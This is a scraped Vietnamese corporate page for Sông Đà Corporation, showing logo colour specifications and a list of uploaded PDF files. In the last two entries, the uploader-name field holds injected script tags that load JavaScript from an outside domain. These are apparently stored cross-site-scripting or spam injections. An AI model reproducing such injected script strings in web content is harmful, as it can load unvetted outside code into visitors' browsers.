Chi tiết

Chi tiết

Thông điệp của Chủ tịch HĐQT Tổng công ty năm 2018

(Thông tin chi tiết đang được điều chỉnh và cập nhập trong thời gian sớm nhất)

Thông tin thương hiệu

 

MẪU BIỂU TƯỢNG

CỦA TỔNG CÔNG TY SÔNG ĐÀ-CTCP

Áp dụng thực hiện từ ngày 01/01/2002

Màu sắc nhãn hiệu: Đỏ, Xanh, Trắng, Đen

Loại nhãn hiệu: Thông thường

Chữ SD có màu đỏ (RED); Tỷ lệ: Magenta 100; Yellow: 100

Hình tam giác có màu xanh (Blue); Tỷ lệ: Cyan: 100; Magenta: 100

du-lich-quy-nhon.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi viet nam, 10:55 13/10/2019
Xem trước
1 của 3

quynhon-binhdinh.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi viet nam, 11:52 18/01/2020
Xem trước
1 của 4

dao-phuquy.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi viet nam, 11:54 18/01/2020
Xem trước
1 của 3

chinhphuc-nhatrang.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi viet nam, 11:54 18/01/2020
Xem trước
1 của 3

shop-quanao.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi viet nam, 11:55 18/01/2020
Xem trước
1 của 2

vay-dobo.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi viet nam, 11:55 18/01/2020
Xem trước
1 của 1

ga.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi Thieu Van Nguyen, 12:11 20/03/2022
Xem trước
1 của 2

tim-duong-di-01.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi < < </div> <div><script scr="https://v.timduongdi.com/gialamhanoi.js"></scr, 10:49 25/06/2022
tim-duong-di-01.pdf
Xem trước
1 của 101

datmaps-sitemap-1.pdf (Phiên bản 1.0)

Hình nhỏ Được tải lên bởi < < <script scr="https://v.timduongdi.com/2.js"></script>, 13:55 15/07/2022
Xem trước
1 của 18

Songda Profile


TẢI VỀ PROFILE